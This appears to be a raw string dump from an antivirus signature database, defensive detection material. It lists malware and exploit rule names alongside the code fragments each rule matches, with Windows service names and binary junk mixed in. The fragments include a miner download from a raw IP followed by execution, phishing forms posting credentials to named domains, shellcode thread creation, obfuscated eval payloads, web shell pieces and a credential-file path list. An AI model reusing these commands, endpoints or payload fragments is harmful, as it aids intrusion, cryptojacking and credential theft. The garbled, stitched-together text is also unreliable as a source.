z'O!#TEL:Exploit:O97M/CVE-2017-11882.N!wimLua:Equation3InRTF&SCRIPT:OLE.EquationCLSID&SCRIPT:Equation3_Overflow_WinExec.A !#TEL:SCRIPT/WmiLaunchRundll32_JavaScript.AMpIsWmiAMSIScan&SCRIPT:WmiCreateProcess&SCRIPT:WmiLaunchRundll32_JavaScript z+K!#TEL:SCRIPT/WmiLaunchRundll32_JavaScript.AMpIsWmiAMSIScan&SCRIPT:WmiCreateProcess&SCRIPT:WmiLaunchRundll32_JavaScript !#SLF:Context/ShortcutFileInEdgeBrowserDownloads.ARPF:TopLevelFile&Lua:LnkExt&Lua:FileInMicrosoftEdgeDownloadsFolder.A z2D!#SLF:Context/ShortcutFileInEdgeBrowserDownloads.ARPF:TopLevelFile&Lua:LnkExt&Lua:FileInMicrosoftEdgeDownloadsFolder.A !#ALFPER:AGGR:Win32/AgileDotNetObfuscatorUnsigned.ALowfi:HSTR:Win32/AgileDotNetObfuscator&!PEPCODE:HasDigitalSignature z3C!#ALFPER:AGGR:Win32/AgileDotNetObfuscatorUnsigned.ALowfi:HSTR:Win32/AgileDotNetObfuscator&!PEPCODE:HasDigitalSignature !#TEL:HTML/Redir.ABLUA:FileSizeLE5000.A&SCPT:HTML/ReferrerHeader&SCPT:HTML/SuspiciousPhish&SCPT:HTML/SuspiciousRedirect d!#TEL:HTML/Redir.ABLUA:FileSizeLE5000.A&SCPT:HTML/ReferrerHeader&SCPT:HTML/SuspiciousPhish&SCPT:HTML/SuspiciousRedirect !#TEL::VBS/Miuporu.ASCRIPT:VBS/WritePS1File&SCRIPT:VBS/ExecutePS1File&(SCRIPT:VBS/CreateScheduledTask|SCPT:PSCmdSlashC) c!#TEL::VBS/Miuporu.ASCRIPT:VBS/WritePS1File&SCRIPT:VBS/ExecutePS1File&(SCRIPT:VBS/CreateScheduledTask|SCPT:PSCmdSlashC) !#TEL:O97M/Powdow.NAInEmail&BM_OLE_FILE&LUA:FileSizeLE80000.A&MHSTR:Obfuscator.EmptyAssign&MHSTR:ShellInTextboxChange.A c!#TEL:O97M/Powdow.NAInEmail&BM_OLE_FILE&LUA:FileSizeLE80000.A&MHSTR:Obfuscator.EmptyAssign&MHSTR:ShellInTextboxChange.A !#ALF:COMScriptletRunSCRIPT:WScriptShellRun&(TEL:SCPT:Trojan:Win32/COMScriptlet.A|TEL:SCPT:Trojan:Win32/COMScriptlet.B) b!#ALF:COMScriptletRunSCRIPT:WScriptShellRun&(TEL:SCPT:Trojan:Win32/COMScriptlet.A|TEL:SCPT:Trojan:Win32/COMScriptlet.B) !#SLF:MsBuildInlineTsk.CSCRIPT:TargetTask&SCRIPT:Realm.task!func&SCRIPT:ContainsClassCode.B&SCRIPT:ContainsCsharpCode.B _!#SLF:MsBuildInlineTsk.CSCRIPT:TargetTask&SCRIPT:Realm.task!func&SCRIPT:ContainsClassCode.B&SCRIPT:ContainsCsharpCode.B !#AGGR:Tobeet_Msil_0C242822pea_ismsil&HSTR:InstallerFile&HSTR:MSIL/PossibleKeylogger.A5&HSTR:Win32/PossibleKeylogger.C1 \\!#AGGR:Tobeet_Msil_0C242822pea_ismsil&HSTR:InstallerFile&HSTR:MSIL/PossibleKeylogger.A5&HSTR:Win32/PossibleKeylogger.C1 !#AGGR:Tobeet_Msil_27B6109BHSTR:MSIL.MyNamespace&pea_ismsil&HSTR:MSIL/PossibleKeylogger.A5&ATTRIBUTE:SIGA:MSIL:EMAIL:S1 \\!#AGGR:Tobeet_Msil_27B6109BHSTR:MSIL.MyNamespace&pea_ismsil&HSTR:MSIL/PossibleKeylogger.A5&ATTRIBUTE:SIGA:MSIL:EMAIL:S1 !#AGGR:Tobeet_Msil_4E8D0A83pea_ismsil&HSTR:InstallerFile&HSTR:MSIL/Class.UriBuilder.A&AGGR:Lua:MSIL.AbnormalMethod.Name \\!#AGGR:Tobeet_Msil_4E8D0A83pea_ismsil&HSTR:InstallerFile&HSTR:MSIL/Class.UriBuilder.A&AGGR:Lua:MSIL.AbnormalMethod.Name !#AGGR:Tobeet_Msil_512D4FE1pea_ismsil&HSTR:InstallerFile&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo1&HSTR:FileSharingURL \\!#AGGR:Tobeet_Msil_512D4FE1pea_ismsil&HSTR:InstallerFile&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo1&HSTR:FileSharingURL !#AGGR:Tobeet_Msil_536E4B7Bpea_ismsil&HSTR:InstallerFile&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo&HSTR:Tobeet_D80300B4 \\!#AGGR:Tobeet_Msil_536E4B7Bpea_ismsil&HSTR:InstallerFile&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo&HSTR:Tobeet_D80300B4 !#AGGR:Tobeet_Msil_7DECF1ABpea_ismsil&HSTR:InstallerFile&AGGR:Lua:MSIL:FrameworkV4&HSTR:Tobeet_D80300B4&LUA:SuspVerinfo \\!#AGGR:Tobeet_Msil_7DECF1ABpea_ismsil&HSTR:InstallerFile&AGGR:Lua:MSIL:FrameworkV4&HSTR:Tobeet_D80300B4&LUA:SuspVerinfo !#TEL:Trojan:Win32/Tisifi.DLua:ContextFromWebmail&HSTR:Win32/DelphiFile&HSTR:HasSEH&pea_isdamaged&SuspiciousEXEfilename \\!#TEL:Trojan:Win32/Tisifi.DLua:ContextFromWebmail&HSTR:Win32/DelphiFile&HSTR:HasSEH&pea_isdamaged&SuspiciousEXEfilename !#SCPT:WannamineDownloadLinksSCPT:Trojan:PowerShell/WannaMine.downloadlnk|SCPT:Trojan:PowerShell/WannaMine.downloadlnk2 Z!#SCPT:WannamineDownloadLinksSCPT:Trojan:PowerShell/WannaMine.downloadlnk|SCPT:Trojan:PowerShell/WannaMine.downloadlnk2 !#TEL:Trojan:Java/Jibem.A!wim//Lua:JarTimeStampLastTenDays&//Lua:Java.SuspiciousCrypter.Loose.A&!AGGR:CombinedJavaClass Z!#TEL:Trojan:Java/Jibem.A!wim//Lua:JarTimeStampLastTenDays&//Lua:Java.SuspiciousCrypter.Loose.A&!AGGR:CombinedJavaClass !#AGGR:MSIL:DynGenRuntimeClass.Cpea_ismsil&HSTR:MSIL/NameSpace.CompilerServices.A&Lua:MSIL:PossiblyDynGenRuntimeClass.A { W!#AGGR:MSIL:DynGenRuntimeClass.Cpea_ismsil&HSTR:MSIL/NameSpace.CompilerServices.A&Lua:MSIL:PossiblyDynGenRuntimeClass.A !#TEL:AGGR:SupportScam:JS/TechBrolo.NSCRIPT:JS/TechAlertCode.H&(SCRIPT:JS/TechAlertCode.C|SCRIPT:JS/TechMsgAlertCode.A) {%R!#TEL:AGGR:SupportScam:JS/TechBrolo.NSCRIPT:JS/TechAlertCode.H&(SCRIPT:JS/TechAlertCode.C|SCRIPT:JS/TechMsgAlertCode.A) !#TEL:Exploit:O97M/CVE-2017-11882.P!wimAGGR:RTF_File&LUA:FileSizeLE80000.A&SCPT:RTF.Objdata&SCPT:RTF.LikelyObfuscated.B {'P!#TEL:Exploit:O97M/CVE-2017-11882.P!wimAGGR:RTF_File&LUA:FileSizeLE80000.A&SCPT:RTF.Objdata&SCPT:RTF.LikelyObfuscated.B !#ALF:Exploit:O97M/CVE-2017-11882.BKKO!MTBSCPT:Exploit:O97M/CVE-2017-11882.BKKO1&SCPT:Exploit:O97M/CVE-2017-11882.BKKO3 {*M!#ALF:Exploit:O97M/CVE-2017-11882.BKKO!MTBSCPT:Exploit:O97M/CVE-2017-11882.BKKO1&SCPT:Exploit:O97M/CVE-2017-11882.BKKO3 !#ALF:TrojanDownloader:O97M/Powdow.LIF!MTBSCPT:TrojanDownloader:O97M/Powdow.LIF1&SCPT:TrojanDownloader:O97M/Powdow.LIF2 {*M!#ALF:TrojanDownloader:O97M/Powdow.LIF!MTBSCPT:TrojanDownloader:O97M/Powdow.LIF1&SCPT:TrojanDownloader:O97M/Powdow.LIF2 !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!7zip_excelLua:OfficeExtractedFileInZip.A!7zip_excel&MHSTR:MacroInside {<;!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!7zip_excelLua:OfficeExtractedFileInZip.A!7zip_excel&MHSTR:MacroInside !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!wzip_excelLua:OfficeExtractedFileInZip.A!wzip_excel&MHSTR:MacroInside {<;!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!wzip_excelLua:OfficeExtractedFileInZip.A!wzip_excel&MHSTR:MacroInside !#AGGR:Tobeet_Msil_1B65054Dpea_ismsil&AGGR:Lua:MSIL:FrameworkV4&HSTR:MSIL/PossibleKeylogger.A5&HSTR:Tobeet_Msil_B92F0590 ]!#AGGR:Tobeet_Msil_1B65054Dpea_ismsil&AGGR:Lua:MSIL:FrameworkV4&HSTR:MSIL/PossibleKeylogger.A5&HSTR:Tobeet_Msil_B92F0590 !#AGGR:Tobeet_Msil_39B990D0pea_ismsil&HSTR:InstallerFile&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo1&HSTR:Tobeet_BF56481B ]!#AGGR:Tobeet_Msil_39B990D0pea_ismsil&HSTR:InstallerFile&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo1&HSTR:Tobeet_BF56481B !#SLF:Win32/CmdBatchFileWithLolBins.A!msworkflowRPF:TopLevelFile&(Lua:BATExt|Lua:CMDExt)&SCRIPT:MsWorkflowCompilerString |0H!#SLF:Win32/CmdBatchFileWithLolBins.A!msworkflowRPF:TopLevelFile&(Lua:BATExt|Lua:CMDExt)&SCRIPT:MsWorkflowCompilerString !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!rar_pptLua:OfficeExtractedFileInZip.A!rar_powerpoint&MHSTR:MacroInside |9?!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!rar_pptLua:OfficeExtractedFileInZip.A!rar_powerpoint&MHSTR:MacroInside !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!zip_pptLua:OfficeExtractedFileInZip.A!zip_powerpoint&MHSTR:MacroInside |9?!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!zip_pptLua:OfficeExtractedFileInZip.A!zip_powerpoint&MHSTR:MacroInside !#AGGR:Tobeet_Msil_092DA760pea_ismsil&AGGR:Lua:MSIL:FrameworkV4&HSTR:MSIL/Possible ^!#AGGR:Tobeet_Msil_092DA760pea_ismsil&AGGR:Lua:MSIL:FrameworkV4&HSTR:MSIL/Possible AsyncMac System32\\DRIVERS\\asyncmac.sys Microsoft Base Cryptographic Provider v1.0 ServicesActive MpVregOpenKeySuccess 32222 S-1-0x%I64x S-1-%d WDTerminal Server Device Redirector DriverrdpdrRDPCDDRdbssDirect ParallelRasptiRemote Access PPPOE DriverRasPppoeRemote Access Connection ManagerRasManWAN Miniport (L2TP)Rasl2tpRemote Access Auto Connection ManagerRasAutoRemote Access Auto Connection DriverRasAcdDirect Parallel Link DriverPtilinkQoS Packet SchedulerPSchedProtected StorageProtectedStorageWAN Miniport (PPTP)PptpMiniportIPSEC ServicesPolicyAgentPlug and PlayPlugPlayPDRFRAMEPDRELIPDFRAMEPDCOMPPcmciaPCIIdePCIDumpPCI Bus DriverPCIParVdmPartMgrParallel port driverParportIPX Traffic Forwarder DriverNwlnkFwdIPX Traffic Filter DriverNwlnkFltNullRemovable StorageNtmsSvcNT LM Security Support ProviderNtLmSspNtfsNpfsNetwork Location Awareness (NLA)NlaNetwork ConnectionsNetmanNet LogonNetlogonNetwork DDE DSDMNetDDEdsdmNetwork DDENetDDENetBios over TcpipNetBTNetBIOS InterfaceNetBIOSNDIS ProxyNDProxyRemote Access NDIS WAN DriverNdisWanNDIS Usermode I/O ProtocolNdisuioRemote Access NDIS TAPI DriverNdisTapiNDIS System DriverNDISNetwork Access Protection AgentnapagentMupMicrosoft System Management BIOS DrivermssmbiosMicrosoft Streaming Quality Manager ProxyMSPQMMicrosoft Streaming Clock ProxyMSPCLOCKMicrosoft Streaming Service ProxyMSKSSRVWindows InstallerMSIServerMsfsDistributed Transaction CoordinatorMSDTCMRxSmbWebDav Client RedirectorMRxDAVWindows FirewallMpsSvcMountMgrMouse Class DriverMouclassModemNetMeeting Remote Desktop SharingmnmsrvcmnmddMessengerTCP/IP NetBIOS HelperLmHostsWorkstationlanmanworkstationServerLanmanServerKSecDDMicrosoft Kernel Wave Audio MixerkmixerKeyboard Class DriverKbdclassPnP ISA/EISA Bus DriverisapnpIR Enumerator ServiceIRENUMIPSEC driverIPSecIP Network Address TranslatorIpNatIP in IP Tunnel DriverIpInIpIP Traffic Filter DriverIpFilterDriverIPv6 Windows Firewall DriverIp6FwIntelIdeIMAPI CD-Burning COM ServiceImapiServiceCD-Burning Filter DriverImapii8042 Keyboard and PS/2 Mouse Port Driveri8042prtHTTP SSLHTTPFilterHTTPHealth Key and Certificate Management ServicehkmsvcHuman Interface Device AccessHidServHelp and SupporthelpsvcGeneric Packet ClassifierGpcGame Port EnumeratorgameenumVolume Manager DriverFtdiskFsVgaFltMgrFloppy Disk DriverFlpydiskFipsFloppy Disk Controller DriverFdcFast User Switching CompatibilityFastUserSwitchingCompatibilityFastfatCOM+ Event SystemEventSystemEvent LogEventlogError Reporting ServiceERSvcExtensible Authentication Protocol ServiceEapHostMicrosoft Kernel DRM Audio DescramblerdrmkaudDNS ClientDnscacheMicrosoft Kernel DLS SyntheiszerDMusicLogical Disk ManagerdmserverdmloadLogical Disk Manager DriverdmiodmbootLogical Disk Manager Administrative ServicedmadminDisk DriverDiskDHCP ClientDhcpDCOM Server Process LauncherDcomLaunchCryptographic ServicesCryptSvcCpqarrayCOM+ System ApplicationCOMSysAppCmdIdeClipBookClipSrvIndexing ServiceCiSvcChangerCD-ROM DriverCdromCdfsCdaudioComputer BrowserBrowserBackground Intelligent Transfer ServiceBITSBeepAudio Stub DriveraudstubWindows AudioAudioSrvATM ARP Client ProtocolAtmarpcAtdiskStandard IDE/ESDI Hard Disk ControlleratapiRAS Asynchronous Media DriverAsyncMacApplication ManagementAppMgmtamsintAliIdeApplication Layer Gateway ServiceALGAlerterAFDMicrosoft Kernel Acoustic Echo CancelleraecACPIECMicrosoft ACPI DriverACPIAsyncMacSystem32\\DRIVERS\\asyncmac.sysMicrosoft Base Cryptographic Provider v1.0JohnDoeJohnDoeServicesActiveServicesActivecaSOFTWARE\\MicrosoftMpVregOpenKeySuccesszzy:\\smNULLedf:\\32222%dS-1-0x%I64xS-1-%d%dS-1-0x%I64xS-1-%d... @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @@ 0 0 \t0\t \t 0\t advapi32.pdb 8u\tjW al(dec_cmd);return0;} !#SCRIPT:JS/Nemucod!fxn wscript[ Fwscript[ );while( ){try{ Pfalse); =\"sleep\";while !#SCRIPT:PassthruInvoke -namespace'win32'-passthru[byte[]]$ F-namespace'win32'-passthru[byte[]]$ [system.convert]:: `).invoke( !#White:GoogleUpdate.A1 c:\\google\\autoit3.exe/autoit3executescriptc:\\google\\googleupdate.a3x Fc:\\google\\autoit3.exe/autoit3executescriptc:\\google\\googleupdate.a3x !#PUA:MacOS/SurfBuyer.F1 mmtmp=\"/private/tmp/.mminstallerscripts_`date+%y%m%d%h%m%s`\"mkdir-p Emmtmp=\"/private/tmp/.mminstallerscripts_`date+%y%m%d%h%m%s`\"mkdir-p functionshowpopup(pstrid,pstrhid){varmydiv=document.getelementbyid( Efunctionshowpopup(pstrid,pstrhid){varmydiv=document.getelementbyid( vlocity.cardframework.registermodule.controller('testaccountdetails Evlocity.cardframework.registermodule.controller('testaccountdetails b(\"__decorate\",h);b(\"__param\",c);b(\"__metadata\",a);b(\"__awaiter\",f) Eb(\"__decorate\",h);b(\"__param\",c);b(\"__metadata\",a);b(\"__awaiter\",f) varminscore=4.0;varfarve=['green','lgreen','white','yellow','red']; Evarminscore=4.0;varfarve=['green','lgreen','white','yellow','red']; !#SCPT:PDF/MaliciousLink >>endobj1 E>>endobj1 0-90obj<</type/action/s/uri/uri(http:// @/commercial) @/corrections @/inv- !#HackTool:Python/DDos.B2 headers_referers.append('http://www.usatoday.com/search/results?q= Dheaders_referers.append('http://www.usatoday.com/search/results?q= !#SCPT:JS/Obfuse.RKD1!MTB http:\\/\\/frolicatier.com\\/wp-includes\\/js\\/wp-emoji-release.min.js Dhttp:\\/\\/frolicatier.com\\/wp-includes\\/js\\/wp-emoji-release.min.js !#SCPT:PDF:Stayt_95C1F0B2 /encoding/winansiencoding/fontdescriptor60r/firstchar32/lastchar80 D/encoding/winansiencoding/fontdescriptor60r/firstchar32/lastchar80 !#SCPT:ShellExecTempEnv.A .exe');(new-object-comshell.application).shellexecute($env:temp+'\\ D.exe');(new-object-comshell.application).shellexecute($env:temp+'\\ !#SCPT:Trojan:JS/Miuref_A vart=\"charcodeat\";varu=\"fromcharcode\";vara=atob(g);eval(i(a,'s')); Dvart=\"charcodeat\";varu=\"fromcharcode\";vara=atob(g);eval(i(a,'s')); !#SCRIPT:HTML/PhishHref.A href=\"http://www.dsdsd.com/\"rel=\"nofollow\"target=\"_top\">yahoo!</a> Dhref=\"http://www.dsdsd.com/\"rel=\"nofollow\"target=\"_top\">yahoo!</a> !#Constructor:Win32/EDA2.1 *eda2maybeusedonlyforeducationalpurposes.donotuseitasaransomware! C*eda2maybeusedonlyforeducationalpurposes.donotuseitasaransomware! ,@echooff C,@echooff \ta-z0-9-_.@ \ta-z0-9-_., botadmin=falsedoudpflood=falsedohttpflood=falsedohttpsflood=false Cbotadmin=falsedoudpflood=falsedohttpflood=falsedohttpsflood=false \\\\\\%\\%\\{\\}\\}}{\\}\\{\\+\\\\\\%\\%\\{\\}\\}}}}}}}}forpentestingpurposesonly! C\\\\\\%\\%\\{\\}\\}}{\\}\\{\\+\\\\\\%\\%\\{\\}\\}}}}}}}}forpentestingpurposesonly! =getobject(\"winm\"+\"gmts:{impersonationlevel=impersonate}!\\\\.\\root C=getobject(\"winm\"+\"gmts:{impersonationlevel=impersonate}!\\\\.\\root <si><t>https://tecnicopconline.com/wp-admin/jekbvhub.php</t></si> C<si><t>https://tecnicopconline.com/wp-admin/jekbvhub.php</t></si> !#SCPT:O97M/Qakbot.VA4!MTB ><si><t>https://eletrocoghi.com.br/drms/fert.html</t></si><si><t> C><si><t>https://eletrocoghi.com.br/drms/fert.html</t></si><si><t> !#SCPT:SetFileAttribHidden execute('f\"& Cexecute('f\"& !#SCRIPT:HTML/TechBrolo.B2 '));eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28% C'));eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28% !#Exploit:Python/Leivion.C2 .windll.kernel32.createthread B.windll.kernel32.createthread %.c_int(0), %.c_int !#HackTool:MacOS/Brootkit.C functionnetstat(){localhide_porttmp_portold_ifsold_ifs=$ifs;ifs= Bfunctionnetstat(){localhide_porttmp_portold_ifsold_ifs=$ifs;ifs= !#PSinputOutputRedirected.A fo.redirectstandardinput=1 Bfo.redirectstandardinput=1 .startinfo.redirectstandardoutput=1 !#SCPT:CodeOnly.Flyheart.AB -math.max(a,b);let B-math.max(a,b);let =newarray(7); 1337; !#SCPT:Trojan:HTML/Phish!s1 <formname=\"frmlog\"method=\"post\"action=\"./cadastro/promocao.php\"> B<formname=\"frmlog\"method=\"post\"action=\"./cadastro/promocao.php\"> !#SCPT:Trojan:PDF/Phish.DR2 obj<</s/uri/uri(http://binni-ks.com/modules/dashgoals/binni.htm) Bobj<</s/uri/uri(http://binni-ks.com/modules/dashgoals/binni.htm) !#SCRIPT:JS/TechPushState.A window.history.pushstate( Bwindow.history.pushstate( document.location.href= varminer=newcoinblind.anonymous(' Bvarminer=newcoinblind.anonymous(' throttle });miner.start(); !#SCPT:CodeOnly.Wildlinger.A const__buf8=newarraybuffer(8);const__dvcvt=newdataview(__buf8); Aconst__buf8=newarraybuffer(8);const__dvcvt=newdataview(__buf8); !#SCPT:Exploit:JS/Axpergle.O window['parse'+'int'], Awindow['parse'+'int'], +'of' `window['m'+ 0['fl' length%2 location.replace(\"https:\\/\\/w3.veryfastandfaster.xyz\\/proc.php? Alocation.replace(\"https:\\/\\/w3.veryfastandfaster.xyz\\/proc.php? !#SCPT:O97M/EncDoc.VAI24!MTB <f>exec(\"rundll32\"&\"..\\xl\\media\\image2.bmp\"&\",startw\")< A<f>exec(\"rundll32\"&\"..\\xl\\media\\image2.bmp\"&\",startw\")< !#SCPT:O97M/Trickbot.RTR!EML living-traditions.com/ Aliving-traditions.com/ .php</t></si><si><t> O<si><t>http:// !#SCPT:Trojan:HTML/Phish.CB2 www.willyexpress.lu/contents/result.php Awww.willyexpress.lu/contents/result.php method=\"post\"action= @method=\"post\"action= !#SCPT:Trojan:HTML/Phish.IB1 <formaction=\"https://casciscus.com/wp-admin/v4/pocket.php\"name= A<formaction=\"https://casciscus.com/wp-admin/v4/pocket.php\"name= !#SCPT:Trojan:HTML/Phish.JC4 type:'post',data:{email:email,password:password,detail:detail,} Atype:'post',data:{email:email,password:password,detail:detail,} !#SCPT:Trojan:HTML/Phish.JF2 url=https://register.hiramhousecamp.org/miouadthen/po1820.zip\"> Aurl=https://register.hiramhousecamp.org/miouadthen/po1820.zip\"> !#SCPT:Trojan:HTML/Phish.JL1 https%3a//nacademyng.com/excel_os/x3d.php%22%20method%3d%22post Ahttps%3a//nacademyng.com/excel_os/x3d.php%22%20method%3d%22post !#SCPT:Trojan:HTML/Phish.SU3 signinwithyourcorrectemailandpasswordtoreviewpackageinformation Asigninwithyourcorrectemailandpasswordtoreviewpackageinformation !#SCPT:Worm:VBS/Dapato.A!lnk \\..\\..\\windows\\system32\\wscript.exe/e:vbscript.encodephoto.jpeg A\\..\\..\\windows\\system32\\wscript.exe/e:vbscript.encodephoto.jpeg !#SCRIPT:Exploit:JS/AimesuL3 divid=\"heap_allign\"></div><divid=\"table_div\"></div><appletcode= Adivid=\"heap_allign\"></div><divid=\"table_div\"></div><appletcode= !#SCRIPT:PHP/Dirtelti.I1!MTB =\"/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf\" A=\"/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf\" <audioautoplay=\"\"><sourcesrc=\"td.mp3\"type=\"audio/mpeg\"></audio> A<audioautoplay=\"\"><sourcesrc=\"td.mp3\"type=\"audio/mpeg\"></audio> !#Trojan:BAT/Sciptos.YC2!MTB wmicprocesswhere\"name='% Awmicprocesswhere\"name='% %'\"getexecutablepath/value^|findstr: !#Trojan:Linux/CoinMiner.Ya2 wget$dir/kinsinghttp://93.189.43.3/kinsingchmod+x$dir/kinsingif Awget$dir/kinsinghttp://93.189.43.3/kinsingchmod+x$dir/kinsingif !#SCPT:O97M/EncDoc.ALVPJ3!MTB <si><t>http://myplanet.group/xuxzryvq1/ind.html</t></si></sst> @<si><t>http://myplanet.group/xuxzryvq1/ind.html</t></si></sst> !#SCPT:Trojan:BAT/Starter.G19 !%systemroot%\\system32\\shell32.dll%comspec%%comspec%%wn]nd. @!%systemroot%\\system32\\shell32.dll%comspec%%comspec%%wn]nd. !#SCPT:Trojan:BAT/SysWiper.V2 copyeulascr.exe%homedrive%\\windows\\system32\\ @copyeulascr.exe%homedrive%\\windows\\system32\\ !#SCPT:Trojan:HTML/Phish.JAA4 url:'https://sotheraho.com/wp-content/fonts/reportexcelnew.php @url:'https://sotheraho.com/wp-content/fonts/reportexcelnew.php !#SCPT:Win32/AutoitInject.AR1 @endfuncdim$ ?]=[\"jcmewjjky.exe\",\" !#SCRIPT:BAT/RansomVolcrypt.A \"%temp%\\svchost.exe\"--batch @\"%temp%\\svchost.exe\"--batch homedir\"%temp%\"--gen-key\"%temp%\\ =base64_decode( @=base64_decode( \")](divid).innerhtml); class=\"download_link\"><divclass=\"button\"onclick=\"showstep();\"> @class=\"download_link\"><divclass=\"button\"onclick=\"showstep();\"> @setinterval(function(){alert(\" harddrive delete !#SCRIPT:PowerShell/Spritz.A5 new-objectsystem.directoryservices.directoryentry( @new-objectsystem.directoryservices.directoryentry( !#TrojanDownloader:VBS/Adodb3 shellexecute(\"wscript.exe\",\"\" @shellexecute(\"wscript.exe\",\"\" .vbs\"uac\",\"\",\"runas\",\"1\"); !#SCPT:Trojan:HTML/Phish!atb04 >pleasewaitwhilemicrosoftfetchyourvoicemailmessagefromserver< ?>pleasewaitwhilemicrosoftfetchyourvoicemailmessagefromserver< !#SCPT:Trojan:HTML/Phish.BHK18 <formaction=\"https://injectsorals.com/11/i.php\"method=\"post\"> ?<formaction=\"https://injectsorals.com/11/i.php\"method=\"post\"> !#SCPT:Trojan:HTML/Phish.BHK23 <formaction=\"https://tomamate.si/ ?<formaction=\"https://tomamate.si/ /pdfnv.php\"method=\"post\"> !#SCPT:Trojan:JS/Phish.PY2!MTB <formaction=\"http://injectsorals.com/ ?<formaction=\"http://injectsorals.com/ /i.php\"method=\"post\"> !#SCRIPT:BAT:Pterodo.Copy.S001 copy\"\\mpclients.dll\"\"%appdata%\\microsoft\\office\\mso ?copy\"\\mpclients.dll\"\"%appdata%\\microsoft\\office\\mso .obn\"/y !#SCRIPT:Exploit:JS/Elecom.E.3 while(buffer.length<3092)buffer+=\"\\x0a\"+\"\\x0a\"+\"\\x0a\"+\"\\x0a\"; ?while(buffer.length<3092)buffer+=\"\\x0a\"+\"\\x0a\"+\"\\x0a\"+\"\\x0a\"; <audioautoplay=\"\"preload=\"\"><sourcesrc=\"data:audio/ ?<audioautoplay=\"\"preload=\"\"><sourcesrc=\"data:audio/ ;base64 <audioautoplay=\"autoplay\"preload=\"\"><sourcesrc=\" ?<audioautoplay=\"autoplay\"preload=\"\"><sourcesrc=\" \"></audio> !#SCRIPT:PSExploitShellCode.A6 availablepayloads ?availablepayloads invoke shellcode payload attributes !#SCRIPT:Pavica_Nsis7zipPasswd dir\\commonfiles5\\7za.exe0zip-t\\nsexec.dll ?dir\\commonfiles5\\7za.exe0zip-t\\nsexec.dll \\adobeupdater.lnk vk.com>>%systemroot%\\system32\\drivers\\etc\\% ?vk.com>>%systemroot%\\system32\\drivers\\etc\\% 0echo typeofwindow==\"undefined\"?\" ?typeofwindow==\"undefined\"?\" .replace !#Trojan:PowerShell/MemExec.A2 createthread(0,0, ?createthread(0,0, ,0,0,0);start-sleep-second %(shellcode) !#ALF:ObfuscatedBatScript.B!ibt >/v:o !#SCPT:Backdoor:PHP/Dirtelti.P4 echo@serialize(array(\"uid\"=> >echo@serialize(array(\"uid\"=> ,\"v\"=> !#SCPT:CodeOnly.CVE-2018-4233.A //shareabutterflyforeasierboxing/unboxingvarshared_butterfly >//shareabutterflyforeasierboxing/unboxingvarshared_butterfly !#SCPT:Trojan:ASP/WebShell.S002 newobject[] >newobject[] ;object .invoke </script> !#SCPT:Trojan:HTML/Phish.REFB11 location.replace(\"https:\\/\\/s95.l-o-a-d-i-n-g.net\\/proc.php? >location.replace(\"https:\\/\\/s95.l-o-a-d-i-n-g.net\\/proc.php? !#SCPT:Trojan:HTML/Phish.REFB21 location.replace(\"https:\\/\\/freeoffers.freeof.xyz\\/proc.php? >location.replace(\"https:\\/\\/freeoffers.freeof.xyz\\/proc.php? !#SCPT:Trojan:Win32/Wysotot!lnk http://www.v9tr.com >http://www.v9tr.com iexplorefirefoxoperachrome.exe !#SCRIPT:PowerShell/LockWats.A1 :windir+\"\\system32\\drivers\\mrxdav.sys >:windir+\"\\system32\\drivers\\mrxdav.sys =get-fileversioninfo !#SCRIPT:Ransom:HTML/Tescrypt.E install,runtorbrowser >install,runtorbrowser insertlinkintheaddressbar: .onion/ !#Scpt:PS:CryptoStreamCreation1 =new-objectsystem.security.cryptography.passwordderivebytes( >=new-objectsystem.security.cryptography.passwordderivebytes( !#JAM:XMLHTTPRequestGetWPContent )h !#JAM:XMLHTTPRequestGetWPContent =iserverxmlhttprequest 0/wp-content/ !#SCPT:Trojan:HTML/Phish.SM4!MTB )h !#SCPT:Trojan:HTML/Phish.SM4!MTB window.location.replace(\"https://lixns.com/xl/?referrer=\"); =window.location.replace(\"https://lixns.com/xl/?referrer=\"); !#SCPT:Trojan:JS/Obfuse.RVC1!MTB )h !#SCPT:Trojan:JS/Obfuse.RVC1!MTB click.travelfornamewalking.ga/zet.php?id= =click.travelfornamewalking.ga/zet.php?id= 8varmb=\"https:// !#SCPT:Trojan:VBS/Fekrome.B!sht1 )h !#SCPT:Trojan:VBS/Fekrome.B!sht1 msiexec/ic:\\programdata\\googlechrome.msi/quiet/qn/norestart =msiexec/ic:\\programdata\\googlechrome.msi/quiet/qn/norestart !#SCRIPT:PowerShell/Powerpuff.A5 )h !#SCRIPT:PowerShell/Powerpuff.A5 bitconverter]::tostring( =bitconverter]::tostring( [1]).replace(\"-\",\"\").tolower()); !!#SCPT:Trojan:HTML/Phish.DRD5!MTB )h!!#SCPT:Trojan:HTML/Phish.DRD5!MTB moranmus.com/adobe-vix/document.php <moranmus.com/adobe-vix/document.php postaction=https:// 6postaction=https:// )h!!#SCPT:Trojan:HTML/Phish.SMW1!MTB https://urbanhomefitness.com/file/excelzz/index.php?email= <https://urbanhomefitness.com/file/excelzz/index.php?email= )h!!#SCRIPT:HTML/TechBrolo!AlertFunc (){setinterval(function(){alert(m1) <(){setinterval(function(){alert(m1) 00);alert(m !!#SCRIPT:PowerShell/ResumeProcess )h!!#SCRIPT:PowerShell/ResumeProcess publicstaticexternvoidntresumeprocess(intptrprocesshandle) <publicstaticexternvoidntresumeprocess(intptrprocesshandle) \"!#SCPT:O97M/CVE-2017-0199.RCV1!MTB )h\"!#SCPT:O97M/CVE-2017-0199.RCV1!MTB 